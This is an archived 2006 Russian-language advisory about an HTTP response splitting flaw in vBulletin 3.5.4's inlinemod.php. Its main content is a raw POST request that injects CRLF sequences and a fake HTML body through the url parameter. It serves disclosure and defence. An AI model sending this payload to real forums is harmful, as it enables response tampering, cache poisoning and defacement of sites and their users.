Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12488
HistoryMay 01, 2006 - 12:00 a.m.

vBulletin v3.5.4: HTTP Response Splitting

2006-05-0100:00:00
vulners.com
7

Здравствуйте, vuln.

Уязвимость в параметре url скрипта inlinemod.php при POST-запросе:
зарегистрированный пользователь может редактировать http-ответ.

                 ПРИМЕР:

POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded

do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

Уязвимость обнаружена в vBulletin v3.5.4
Версия 3.0.9 не содержит скрипта inlinemod.php и поэтому не уязвима


С уважением,
Агиевич Игорь aka Shanker mailto:[email protected]